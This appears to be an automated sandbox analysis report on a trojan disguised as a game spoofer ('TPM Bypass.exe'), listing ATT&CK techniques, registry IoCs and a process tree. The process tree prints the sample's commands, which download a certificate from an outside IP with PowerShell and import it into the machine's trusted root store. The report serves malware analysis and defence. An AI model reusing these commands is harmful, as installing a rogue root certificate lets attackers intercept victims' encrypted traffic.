9f0930c6ccac8f9a6a58b056ce2cfa25da6a4c61ce6bdb31d80b963e911e0adf

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-06-2024 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CipherWare Spoofer 04-29/TPM Bypass.exe
Size

5.4MB
MD5

226b0aaa3a81ae166681f1b3c41209f5
SHA1

1e932f41b49428704d2e1ee5cec08a4e61c7d094
SHA256

2c4bd49d86851a375e3669ee361e1a786d59765eb7dbaeeddc62f5cb18f1c66d
SHA512

290ec6a64f3166e516cdcdde28bb99644902598378a18b867e496e0fb821d6597e202d179653353a4da97c1a94f67fed4340e914306a837be85162c0b023a013
SSDEEP

98304:ZXbIrqkTdrVLNdMJ6Hz7OFBZqSn+m6mB5CxFwHXDty:9IBTdrhMJ6Hz0kSn+WKuHXDty

Score

9^/10

evasion execution trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TPM.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6084	powershell.exe
1408	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TPM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TPM.exe

Executes dropped EXE 64 IoCs

pid	Process
4728	TPM.exe
1544	TPM.exe
2608	TPM.exe
3624	TPM.exe
4816	TPM.exe
512	TPM.exe
3220	TPM.exe
3312	TPM.exe
396	TPM.exe
4396	TPM.exe
3308	TPM.exe
532	TPM.exe
2712	TPM.exe
3268	TPM.exe
1376	TPM.exe
2172	TPM.exe
1316	TPM.exe
3704	TPM.exe
1744	TPM.exe
3228	TPM.exe
4424	TPM.exe
4800	TPM.exe
2944	TPM.exe
4908	TPM.exe
32	TPM.exe
1432	TPM.exe
4136	TPM.exe
4484	TPM.exe
4772	TPM.exe
4844	TPM.exe
1084	TPM.exe
4512	TPM.exe
3764	TPM.exe
3420	TPM.exe
464	TPM.exe
2344	TPM.exe
4336	TPM.exe
2952	TPM.exe
2940	TPM.exe
3080	TPM.exe
5000	TPM.exe
4040	TPM.exe
1896	TPM.exe
4236	TPM.exe
1976	TPM.exe
4044	TPM.exe
1552	TPM.exe
3416	TPM.exe
3504	TPM.exe
1672	TPM.exe
1760	TPM.exe
2456	TPM.exe
748	TPM.exe
960	TPM.exe
2016	TPM.exe
4224	TPM.exe
2728	TPM.exe
4560	TPM.exe
2220	TPM.exe
2316	TPM.exe
3632	TPM.exe
3576	TPM.exe
3588	TPM.exe
2148	TPM.exe

Checks for any installed AV software in registry 1 TTPs 2 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avast Software\Avast	Process not Found

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TPM.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	Process not Found
File opened (read-only)	\??\Z:	Process not Found
File opened (read-only)	\??\I:	Process not Found
File opened (read-only)	\??\N:	Process not Found
File opened (read-only)	\??\P:	Process not Found
File opened (read-only)	\??\Q:	Process not Found
File opened (read-only)	\??\G:	Process not Found
File opened (read-only)	\??\R:	Process not Found
File opened (read-only)	\??\S:	Process not Found
File opened (read-only)	\??\Y:	Process not Found
File opened (read-only)	\??\T:	Process not Found
File opened (read-only)	\??\X:	Process not Found
File opened (read-only)	\??\H:	Process not Found
File opened (read-only)	\??\K:	Process not Found
File opened (read-only)	\??\M:	Process not Found
File opened (read-only)	\??\O:	Process not Found
File opened (read-only)	\??\L:	Process not Found
File opened (read-only)	\??\U:	Process not Found
File opened (read-only)	\??\V:	Process not Found
File opened (read-only)	\??\A:	Process not Found
File opened (read-only)	\??\B:	Process not Found
File opened (read-only)	\??\E:	Process not Found
File opened (read-only)	\??\J:	Process not Found

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	Process not Found
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	Process not Found
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	Process not Found
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	Process not Found
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4728	TPM.exe
4728	TPM.exe
4728	TPM.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5968	sc.exe
60	sc.exe
3996	sc.exe
2860	sc.exe
6128	sc.exe
6060	sc.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	Process not Found
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF"	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4036	svchost.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1408	powershell.exe
1408	powershell.exe
4728	TPM.exe
4728	TPM.exe
4728	TPM.exe
4728	TPM.exe
6084	powershell.exe
6084	powershell.exe
6084	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	6084	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2124	Process not Found
Token: SeIncreaseQuotaPrivilege	2124	Process not Found
Token: SeSecurityPrivilege	2124	Process not Found
Token: SeTakeOwnershipPrivilege	2124	Process not Found
Token: SeLoadDriverPrivilege	2124	Process not Found
Token: SeSystemtimePrivilege	2124	Process not Found
Token: SeBackupPrivilege	2124	Process not Found
Token: SeRestorePrivilege	2124	Process not Found
Token: SeShutdownPrivilege	2124	Process not Found
Token: SeSystemEnvironmentPrivilege	2124	Process not Found
Token: SeUndockPrivilege	2124	Process not Found
Token: SeManageVolumePrivilege	2124	Process not Found
Token: SeAssignPrimaryTokenPrivilege	2124	Process not Found
Token: SeIncreaseQuotaPrivilege	2124	Process not Found
Token: SeSecurityPrivilege	2124	Process not Found
Token: SeTakeOwnershipPrivilege	2124	Process not Found
Token: SeLoadDriverPrivilege	2124	Process not Found
Token: SeSystemtimePrivilege	2124	Process not Found
Token: SeBackupPrivilege	2124	Process not Found
Token: SeRestorePrivilege	2124	Process not Found
Token: SeShutdownPrivilege	2124	Process not Found
Token: SeSystemEnvironmentPrivilege	2124	Process not Found
Token: SeUndockPrivilege	2124	Process not Found
Token: SeManageVolumePrivilege	2124	Process not Found
Token: SeAssignPrimaryTokenPrivilege	2124	Process not Found
Token: SeIncreaseQuotaPrivilege	2124	Process not Found
Token: SeSecurityPrivilege	2124	Process not Found
Token: SeTakeOwnershipPrivilege	2124	Process not Found
Token: SeLoadDriverPrivilege	2124	Process not Found
Token: SeSystemtimePrivilege	2124	Process not Found
Token: SeBackupPrivilege	2124	Process not Found
Token: SeRestorePrivilege	2124	Process not Found
Token: SeShutdownPrivilege	2124	Process not Found
Token: SeSystemEnvironmentPrivilege	2124	Process not Found
Token: SeUndockPrivilege	2124	Process not Found
Token: SeManageVolumePrivilege	2124	Process not Found
Token: SeAssignPrimaryTokenPrivilege	2124	Process not Found
Token: SeIncreaseQuotaPrivilege	2124	Process not Found
Token: SeSecurityPrivilege	2124	Process not Found
Token: SeTakeOwnershipPrivilege	2124	Process not Found
Token: SeLoadDriverPrivilege	2124	Process not Found
Token: SeSystemtimePrivilege	2124	Process not Found
Token: SeBackupPrivilege	2124	Process not Found
Token: SeRestorePrivilege	2124	Process not Found
Token: SeShutdownPrivilege	2124	Process not Found
Token: SeSystemEnvironmentPrivilege	2124	Process not Found
Token: SeUndockPrivilege	2124	Process not Found
Token: SeManageVolumePrivilege	2124	Process not Found
Token: SeAssignPrimaryTokenPrivilege	2124	Process not Found
Token: SeIncreaseQuotaPrivilege	2124	Process not Found
Token: SeSecurityPrivilege	2124	Process not Found
Token: SeTakeOwnershipPrivilege	2124	Process not Found
Token: SeLoadDriverPrivilege	2124	Process not Found
Token: SeSystemtimePrivilege	2124	Process not Found
Token: SeBackupPrivilege	2124	Process not Found
Token: SeRestorePrivilege	2124	Process not Found
Token: SeShutdownPrivilege	2124	Process not Found
Token: SeSystemEnvironmentPrivilege	2124	Process not Found
Token: SeUndockPrivilege	2124	Process not Found
Token: SeManageVolumePrivilege	2124	Process not Found
Token: SeAssignPrimaryTokenPrivilege	2124	Process not Found
Token: SeIncreaseQuotaPrivilege	2124	Process not Found

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe

Suspicious use of SendNotifyMessage 11 IoCs

pid	Process
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe
3440	TPM Bypass.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1268	Process not Found
4112	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3440 wrote to memory of 3548	3440	TPM Bypass.exe	86
PID 3440 wrote to memory of 3548	3440	TPM Bypass.exe	86
PID 3548 wrote to memory of 4824	3548	cmd.exe	89
PID 3548 wrote to memory of 4824	3548	cmd.exe	89
PID 4824 wrote to memory of 1184	4824	cmd.exe	90
PID 4824 wrote to memory of 1184	4824	cmd.exe	90
PID 4824 wrote to memory of 908	4824	cmd.exe	91
PID 4824 wrote to memory of 908	4824	cmd.exe	91
PID 4824 wrote to memory of 1408	4824	cmd.exe	92
PID 4824 wrote to memory of 1408	4824	cmd.exe	92
PID 3440 wrote to memory of 4728	3440	TPM Bypass.exe	93
PID 3440 wrote to memory of 4728	3440	TPM Bypass.exe	93
PID 4728 wrote to memory of 1544	4728	TPM.exe	95
PID 4728 wrote to memory of 1544	4728	TPM.exe	95
PID 4728 wrote to memory of 2608	4728	TPM.exe	96
PID 4728 wrote to memory of 2608	4728	TPM.exe	96
PID 4728 wrote to memory of 3624	4728	TPM.exe	97
PID 4728 wrote to memory of 3624	4728	TPM.exe	97
PID 4728 wrote to memory of 4816	4728	TPM.exe	98
PID 4728 wrote to memory of 4816	4728	TPM.exe	98
PID 4728 wrote to memory of 512	4728	TPM.exe	99
PID 4728 wrote to memory of 512	4728	TPM.exe	99
PID 4728 wrote to memory of 3220	4728	TPM.exe	100
PID 4728 wrote to memory of 3220	4728	TPM.exe	100
PID 4728 wrote to memory of 3312	4728	TPM.exe	101
PID 4728 wrote to memory of 3312	4728	TPM.exe	101
PID 4728 wrote to memory of 396	4728	TPM.exe	102
PID 4728 wrote to memory of 396	4728	TPM.exe	102
PID 4728 wrote to memory of 4396	4728	TPM.exe	103
PID 4728 wrote to memory of 4396	4728	TPM.exe	103
PID 4728 wrote to memory of 3308	4728	TPM.exe	104
PID 4728 wrote to memory of 3308	4728	TPM.exe	104
PID 4728 wrote to memory of 532	4728	TPM.exe	105
PID 4728 wrote to memory of 532	4728	TPM.exe	105
PID 4728 wrote to memory of 2712	4728	TPM.exe	106
PID 4728 wrote to memory of 2712	4728	TPM.exe	106
PID 4728 wrote to memory of 3268	4728	TPM.exe	107
PID 4728 wrote to memory of 3268	4728	TPM.exe	107
PID 4728 wrote to memory of 1376	4728	TPM.exe	108
PID 4728 wrote to memory of 1376	4728	TPM.exe	108
PID 4728 wrote to memory of 2172	4728	TPM.exe	109
PID 4728 wrote to memory of 2172	4728	TPM.exe	109
PID 4728 wrote to memory of 1316	4728	TPM.exe	110
PID 4728 wrote to memory of 1316	4728	TPM.exe	110
PID 4728 wrote to memory of 3704	4728	TPM.exe	111
PID 4728 wrote to memory of 3704	4728	TPM.exe	111
PID 4728 wrote to memory of 1744	4728	TPM.exe	112
PID 4728 wrote to memory of 1744	4728	TPM.exe	112
PID 4728 wrote to memory of 3228	4728	TPM.exe	113
PID 4728 wrote to memory of 3228	4728	TPM.exe	113
PID 4728 wrote to memory of 4424	4728	TPM.exe	114
PID 4728 wrote to memory of 4424	4728	TPM.exe	114
PID 4728 wrote to memory of 4800	4728	TPM.exe	115
PID 4728 wrote to memory of 4800	4728	TPM.exe	115
PID 4728 wrote to memory of 2944	4728	TPM.exe	116
PID 4728 wrote to memory of 2944	4728	TPM.exe	116
PID 4728 wrote to memory of 4908	4728	TPM.exe	117
PID 4728 wrote to memory of 4908	4728	TPM.exe	117
PID 4728 wrote to memory of 32	4728	TPM.exe	118
PID 4728 wrote to memory of 32	4728	TPM.exe	118
PID 4728 wrote to memory of 1432	4728	TPM.exe	119
PID 4728 wrote to memory of 1432	4728	TPM.exe	119
PID 4728 wrote to memory of 4136	4728	TPM.exe	120
PID 4728 wrote to memory of 4136	4728	TPM.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3680

C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\TPM Bypass.exe
"C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\TPM Bypass.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4824
  - - C:\Windows\system32\certutil.exe
      certutil -store TrustedRoot
      4⤵
      PID:1184
  - - C:\Windows\system32\findstr.exe
      findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      PID:908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      PID:5012
    - - C:\Windows\system32\certutil.exe
        
        certutil -store TrustedRoot
        5⤵
        
        PID:844
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
        5⤵
        
        PID:4920
- C:\Users\Admin\AppData\Local\Temp\TPM.exe
  C:\Users\Admin\AppData\Local\Temp\TPM.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1544
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2608
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3624
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4816
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:512
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3220
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3312
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:396
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4396
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3308
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:532
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2712
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3268
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1376
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2172
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1316
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3704
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3228
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4424
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4800
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2944
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4908
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:32
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1432
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4136
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4484
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4772
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4844
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1084
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4512
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3764
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3420
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:464
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2344
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
